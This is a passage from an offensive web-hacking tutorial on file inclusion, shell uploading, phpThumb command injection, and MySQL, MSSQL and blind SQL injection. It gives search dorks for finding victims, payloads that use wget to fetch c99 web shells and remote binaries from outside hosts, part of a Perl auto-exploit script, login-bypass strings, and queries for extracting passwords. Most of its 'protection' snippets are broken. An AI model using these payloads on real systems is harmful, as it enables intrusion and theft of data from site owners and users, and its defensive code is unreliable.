http://www.site.com/index.php?page=home
Now instead of home we gonna use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?
If site is vulnerable it should show shell with list of files from site you are attacking.
4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or
some other:
Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>
In that case we are going to use null byte bypass(%00).
Everything after %00 would not count and use. We are also using %00 for picture upload bypass
as php, but I am not going to talk about it.
4. So link should look like this:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00
5) Protection script
Script should look like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>
So we are going to add some stuff to protect it:
Code:
<?php
$page = $_GET['page'];
if(file_exists("pages/".$page) {
include($page);
}
?>
5. Local file inclusion :
1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=
by adding
Code:
../../../../../../etc/passwd
(sometimes you have to add %00 on passwd).
2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=
3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd%00
When you enter this to link you get this:
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List
Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-
exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that site is vulnerable.
4) proc/self/environ
Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on
the site.
6. Instead of etc/passwd%00 we are going to put /proc/self/environ
If page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac
HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%
2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Serv..........
then proc/self/environ is enabled so we can upload the shell.
5) Shell uploading
To upload the shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/
Add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Open site etc:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/s
elf/environ
Tools > Tamper Data
click Start Tamper then refresh page and in user agent put next code:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>
Click OK. To access shell use: Code:www.link.com/shell.php
9. Type Command -: id
Type Command -: uname -a
Type Command -: ls -l
Now Upload a "shell" in this web server so,
Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip
Type Command -: unzip c99.txt.zip
Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming
"out14ws.php" is Public HTML page & move command will copy c99.txt Text to
"opt14ws.php")
Type Command-: ls | grep Out14ws "OR " ls | grep c99
Type Command -: pwd [ To check present working directory of shell ]
Then open full link of your shell in yoyr web browse you get :
http://website-name/path/path/c99.php
http:// website-name/path/path/opt14ws.php.php
11. LFI 2 RCE Using Firefox
Check the target if it is vulnerable to lfi or not
Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00
Now. See -:
http://www.site.com /index.php?page=../../../../../../proc/self/environ-: or
http://www.site.com /index.php?page=../../../../../../proc/self/environ%00
12. Now in address bar or firefox type : " about:config "
Find -: accessibility.browsewithcaret > rightclick > new > string
NEW STRING VALUE : general.useragent.override
Press " Ok " new box will pop up ask for : ENTER STRING VALUE
13. ENTER STRING VALUE : <?php phpinfo(); ?>
It is general.useragent.override
After it u will see something like :
14. Now check the php version and Information while refreshing the vulnerable link or page.
Find disabled information -: disable_functions - system, passthru, shellexec, popen,
escapshellcmd, proc_open etc...
Once u have checked the php info go to : " about:config " page and see for
"general.useragent.override " and ENTER STRING VALUE :
<pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print
"$outputn";}?></pre>
Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd
/etc/passwd, pwd, etc...
For uploading Shell You can type command : wget http://www.site.com/c99.php
Note : after putting command for getting its output you have to refresh the page or vulnable link.
15. Command -: ls -la
Output : On refreshing page
17. Local file download :
1) LFD?
LFD (Local File Download) is vulnerability in script which is used to download files using GET
method, but you can also use it with POST method using add-on Tamper Data.
Code:
http://site.com/download_file.php?file=notepad.exe
2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
3) Vulnerability check
To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exe
We are gonna use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd
If it starts to download and if it open file in text editor it look something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
Script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.
4) Exploiting vulnerability
Now when we know that script is vulnerable, we want to see which files are on host. You can do
this on this way:
Code:
http://site.com/download_file.php?filel=../
18. ../ is gonna back us one directory backward and download file.
1.1 It is possible when it download file and open in text editor to print file list in directories.
1.2 or it is either possible to download file but when it is opened in text editor file is empty.
In case 1.1 we dont have to guess file name and directory and we can download whatever we
want.
In case 1.2 we must guess file name and directory and we can download only files which name
we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website
Copier).
5) Protection script
We have script mentioned at start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
by adding if(file_exists("download/".$file) we are gonna secure script.
So it should look like:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
19. Full path disclosure :
This method let you over errors in file or over errors made by programmers to let you see which
files are in which directories, over it you can't directly hack site, it just let you help while
hacking.
It is useful because it can help you in faster and easier hacking, also it can help you with Local
File Inclusion (LFI), when folder name is changed, or some other file. You can findout using
FPD.
There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.
1st is over array, by adding square brackets on link like this one:
Code:
index.php?page=home
To finish vulnerability attack is to add [] on destined place:
Code:
index.php?page[]=home.
That will give you error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream:
No such file or directory /home/insekure/public_html/index.php on line 211
From this you can see on site is it exists directory blah.
2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-
injection, by adding java code on site you will get error.
This is a javascript code:
Code:
javascript:void(document.cookie='PHPSESSID=');
add that in your address bar and hit enter, now when page is refreshed you will get this error:
Code:
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/example/public_html/thems/errors.php on line 58
then try to open directory thems on site, that should list you files in that directory.
Protection:
Most simple way to protect from this attacks is to turn-off error reporting.
edit or add:
Code:
error_reporting(0);
20. Command Injection Vulnerability Exploit
phpThumb()"fltr[]" Command Injection Vulnerability Exploit Scans
Automatic Shell upload
I. phpThumb() "fltr[]" Command Injection Vulnetability
since the 21th of December 2011 we’ve identified over 300 attempts to exploit the phpThumb() 'fltr[]'
Parameter Command Injection Vulnerability aka CVE-2010-1598 reported back in April 2010. Input
passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a
command line argument.
This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.
Successful exploitation requires that "ImageMagick" is installed.
The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be
exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password".
Source: phpThumb() "fltr[]" Command Injection Vulnerability
By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level
commands as there aren't any input validation checks for the $command data in phpthumb.functions.php.
00.function ImageMagickThumbnailToGD() {
01....
02.foreach ($this->fltr as $filterkey => $filtercommand) {
03.@list($command, $parameter) = explode('|', $filtercommand, 2);
04.switch ($command) {
05....
06.case 'blur':
07.if ($this->ImageMagickSwitchAvailable('blur')) {
08.@list($radius) = explode('|', $parameter);
09.$radius = ($radius ? $radius : 1);
10.$commandline .= ' -blur '.$radius;
11.unset($this->fltr[$filterkey]);
12.}
13.break;
21. 14....
15.$this->DebugMessage('ImageMagick called as
('.$commandline.')', __FILE__, __LINE__);
16.$IMresult = phpthumb_functions::SafeExec($commandline);
17.clearstatcache();
18.if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
19.@unlink($IMtempSourceFilename);
20.}
21.if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
22.$this->FatalError('ImageMagick failed with message
('.trim($IMresult).')');
23.$this->DebugMessage('ImageMagick failed with message
('.trim($IMresult).')', __FILE__, __LINE__);
24....
25.}
The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit
escaping of command line parameters according to the changelog.
escapeshellarg
The updated code uses the php escapeshellarg function and also limits the length of the input.
0.case 'blur':
1.if ($this->ImageMagickSwitchAvailable('blur')) {
2.@list($radius) = explode('|', $parameter);
3.$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
4.$commandline .= ' -blur '.escapeshellarg($radius);
5.$successfullyProcessedFilters[] = $filterkey;
6.}
7.break;
The problem with these extensions is that they use dangerous PHP functions which have the potential to
mess up a web hosting server and hack / exploit user accounts further up to root level.
22. Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing
dangerous commands and take control over the complete server quickly.
Certain functions which are used in such scripts are considered as dangerous and are turned off in the PHP
configuration by certain responsible webhosts.
(Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except
by staying away from scripts that use these dangerous functions.
Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with
the following line:
disable_functions =
exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,
proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec
Source: Disabling dangerous PHP functions
3.5 php.ini & disabled functions
safe_mode = On
expose_php = Off
Enable_dl= Off
magic_quotes = On
register_globals = off
display errors = off
disable_functions = system, show_source, symlink, exec, dl,shell_exec, passthru, phpinfo,
escapeshellarg,escapeshellcmd
Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1
Exploit Scans
The queries are as follows:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l
/tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -
aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755
/tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f;
&phpThumbDebug=9 HTTP/1.1
Breakdown of the requests / commands:
Exploit the vulnerability in phpThum.php fltr[] parameter.
23. GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg;
Display all information about files / directories - shows long listing information about the file / directory.
ls -l /tmp;
Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6.
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;
Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so
that the file can be executed.
chmod 0755 /tmp/barbut6;
Run / Excute file barbut6.
/tmp/barbut6;
The ps command gives a snapshot of the current processes.
On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists
all processes on a terminal, including those of other users, "x" lists all processes without controlling
terminals and "u" adds a column for the controlling user for each process. Note that, for maximum
compatibility when using this syntax, there is no "-" in front of the "aux".
ps -aux;
24. Send SIGKILL to all perl processes. SIGKILL (Signal number 9) is a forced shutdown of a process. Note that
with SIGKILL the process will not have opportunity to clean up any system resources it was using (e.g.
temporary files etc.).
killall -9 perl;
Start perl and run / execute file f.
perl /tmp/f;
The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9.
&phpThumbDebug=9
IP List
List of IP's involved in the scans
65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 |
200.155.17.68
Targets
view source
print?
00.GET /cms/plugins/content/jthumbs/includes/phpThumb.php
01.GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php
02.GET /common/scripts/phpThumb/phpThumb.php
03.GET /phpThumb/phpThumb.php
04.GET /libs/phpThumb/phpThumb.php
05.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
06.GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
07.GET /gallery/phpThumb/phpThumb.php
28. if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~
/Saving to: / ))
{
print "[+] Exploit sent with success. n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. n";
sleep(1.3);
}
print "[*] Controlling if the txt shell has been uploaded ...n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite = "$target/shell.php";
29. $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute</b></a>
::</b></p></td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req-
>content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from Txt to Php :( n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( n";
}
30. MYSQL Injection :
1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
2) Logging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
password' or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.
31. SQL Injection :
1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database.
Vulnerable sites are in format:
Code:
http://www.link.com/index.php?id=
You can put anything else instead of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check:
There are 2 ways to check if site is vulnerable.
1st way, we got link:
Code:
http://site.com/book.php?id=141
we are gonna add only ' at end of link so we get this link:
Code:
http://site.com/book.php?id=141'
2nd way, we got link:
Code:
http://site.com/book.php?id=141
we are going to add +and+1=2-- at end of link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--
If some part of page disappear (picture, text or something) or any error like (You have an error in
your SQL syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link:
Code:
[http://site.com/book.php?id=141
adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5--
32. If page is opens normal there is more then 5 columns. Lets try with 10.
Code:
http://site.com/book.php?id=141+order+by+10--
Now some part of site disappeared, which means that there's more then 5 and less then 10
columns. Lets try 7.
Code:
http://site.com/book.php?id=141+order+by+7--
Page is opened normally which means that there is more then 7 and less then 10 columns. Lets
try 8.
Code:
http://site.com/book.php?id=141+order+by+7--
on column 8 part of site disappear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function union select all on link (in this case) we are
going to add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--
It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be
taken from any column. We are going to take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are going to put
version() or @@version
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--
on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5
we have to guess database version.
We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and
column.
7) Finding table names
If database version is 4 you wont be able to find name of table and column, you have to guess
their names. If database version is skip this step.
Names of some possible tables:
Code:
33. admin
admins
user
users
member
members
Names of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd
If database version is 5 we can take name of table by doing next step: instead of number 2 we
going to put group_concat(table_name) and after number of last column
+from+information_schema.tables+where+table_schema=database()--
So we get this link:
Code:
http://site.com/book.php?id=-
141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_sc
hem a.tables+where+table_schema=database()--
Instead of number 2 it showed name of table, in this case date, book, users. We gonna take
columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead of
group_concat(table_name) we are going to put group_concat(column_name) and instead of
+from+information_schema.tables+where+table_schema=database()-- we are going to put
+from+information_schema.columns+where+table_name=hex-- instead of hex we have to
encrypt in hex name of table.
Go to:
Code:
http://www.string-functions.com/string-hex.aspx
write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now
can see the columns:
Code:
http://site.com/book.php?id=-
141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_s
che ma.columns+where+table_name=0x7573657273--
34. 9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a
stands for to make space between user and pw. Instead of
from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--
and we have link:
Code:
http://site.com/book.php?id=-
141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+us
ers--
and result e.g.:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga
which is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says "not accessible" then change it to
UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish
*/)
On some sites there is also restricted database version so you can use unhex(hex(version()))
11) Site protection from SQL Injection
Just put this code in your script:
Code:
if(!is_numeric($_GET['id']))
{
echo 'It is gonna write text when some try to add /' or and+1=2';
}
35. SQL Injection - Load File :
You found site with SQL vulnerability, now you can try to access table mysql.user and file
privileges.
To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable
column and at end of URL adding '+from+mysql.user--'.
It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.use
r--
If you get username, it means that you have access to mysql.user table and you can continue with
this tut.
Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)'
and of course '+from+mysql.user--'
Now when on page usernames and file priv. are listed you must find username which was written
at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y'
which is Yes. You have privileges.
Load File:
All we have to do is to write on vulnerable column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd').
Which looks like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passw
d'),4--
If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file
name.
Hex e.g.
If we convert file name in Hex, before file name we will add '0x'
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632
f706173737764),4+from+mysql.user--
Hex code '2f6574632f706173737764' works for '/etc/passwd'.
It is recommended for Hex:
Code:
36. www.string-functions.com/string-hex.aspx
If you decide to convert file in Char then add 'load_file(char(converted file to char))'
Which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101
,116,99,47,112,97,115,115,119,100),4--
Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'
Char converter:
Code:
http://pookey.co.uk/binary.php
37. MSSQL Injection :
1) Finding number of columns
I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234
To find column number we gonna use order by function. We will add +order+by+5-- at end of
link.
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--
So we will get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5
is out of range of the number of items in the select list.
/sr/page/member.asp, line 38
which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna
try with 3 and we get next error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'order'.
/sr/page/member.asp, line 44
Which means that there is 3 columns.
2) Finding database version
To find database version we are using @@version.
Code:
http://www.site.com/sr/page/member.asp?id=-
234+union+select+all+1,@@version,3--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008
19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on
38. Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
/sr/page/member.asp, line 38
and from here we can see database version.
3) Finding table name
With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3
+from+information_schema.tables--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Country' to a column of data type int.
/sr/page/member.asp, line 38
and we can see that we have a table called 'Country'.
Now we have to find other tables. We are going to use not+in function. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3
+from+information_schema.tables +where+table_name+not+in('Country')--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Admin' to a column of data type int.
/sr/page/member.asp, line 38
and from here we can see that we have a Admin table.
4) Finding column name
It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this
case we will use where+table_name='Admin'--. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,
3+from+information_schema.colum ns+where+table_name='Admin'--
and we have error:
Code:
39. Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'USERNAME' to a column of data type int.
/sr/page/member.asp, line 38
From here we can see that we have column USERNAME. Now we need rest of the columns so
we gonna use again not+in function.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,
3+from+information_schema.colum
ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'PASSWD' to a column of data type int.
/sr/page/member.asp, line 38
So columns is PASSWD.
5) Taking data from columns
Now we have to put name of table instead of table_name and everything after from we are
entering the name of the table.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+f
rom+Admin--
We get username OjuZwqAul.
It is same for password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+fro
m+Admin--
We get password M7sWt2!2uq.
40. Blind SQL Injection :
1) Blind SQL Injection?
Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not
writing any errors, any table and column names or column content. So that is why it is called
Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind
Injection we don't use --i/* */.
2) Site vulnerability check
We have link:
Code:
http://www.site.com/index.php?id=1
We will add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2
If any part of page disappear, it means that site is vulnerable.
3) Finding database version
As we said already in this method nothing is gonna be showed, so we gonna say that database
version is 4. If part of site disappear it means that version is not 4, but if everything on page stay
as it should it means that version is 4. We gonna use function @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4
If page is loaded as it should then version is 4, if not, then we will try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5
4) MYSQL user
First we will check are we able to use select because it is blocked sometimes.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1
If page is loaded normally we can use select, but if not then we can't use it. Now we will check
do we have MYSQL user access.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1
Same as everything else, if page is loaded normally we have access to mysql.user, if not then we
don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.
41. 5) Finding table name
To find table names all we have to do is guess. First we gonna find table name then after column
name from table.
We have link and we are gonna try to get names of different tables. If page is loaded normally it
means that table name is there and exists.
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1
Our main objective is to to find data from admin table, we can also use:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin
6) Finding column name
Now when we found name of table we wanted it is time to find column name. We doing same as
for table. There is name matching, if page is loaded normally then column exists. We need
logging data so commonly columns gonna be:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass
Link that we use for columns is:
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone)
,1,1)from+ime_tabele+limit+0,1)=1
7) Taking data from columns
In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII
table.
Code:
http://www.asciitable.com/
42. We will look only for DEC and CHR ASCII tables. First we gonna get username, getting letter
by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
We have link:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ limit+0,1)1,1))>from DEC number
If page load normally we found are real letter for username. To find our second letter change
+limit+0,1 to +limit+1,1.
So now we are guessing second letter... It is same for password... So after long long time we get
username and password. If there is more users and if you want to get their passwords too you
will have to add where function.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ where+column_name=something+limit+0,1)1,1))>from DEC
letter
To use where for second column_name we usually using id, but we can also use other stuff. e.g.
for id:
Code:
